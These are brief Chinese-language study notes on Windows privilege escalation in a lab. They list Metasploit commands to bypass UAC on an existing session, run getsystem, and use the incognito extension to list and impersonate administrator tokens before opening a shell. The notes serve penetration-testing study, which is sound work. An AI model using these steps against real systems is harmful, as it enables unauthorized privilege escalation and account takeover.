uac提权和令牌认识
UAC提权
uac一般指用户账户控制。 用户帐户控制
假设在linux里已经控制了一个sessions
use exploit/windows/local/bypassuac
show options
set session 1
run
还可以用
use exploit/windows/local/ask
show options
set session 1
此时在靶机端会出现一个窗口,让你输入密码,并且出现一个新的session
此时可以
getsystem 提权
令牌认识
令牌-token 系统中的临时秘钥
获得令牌就可以在不提供用户名和密码就可以访问别人的
有随机性,一般来说很难被搞到
黑客伪造令牌 核心 kerberos协议
进入上面的system权限的session
use incognito
list_tokens -u //授权令牌列表
impersonate_token TEST1\\Administrator \\伪造令牌
shell \\就会用伪造的用户进入
ps \\查看进程
use incognito
list_tokens -u
shell
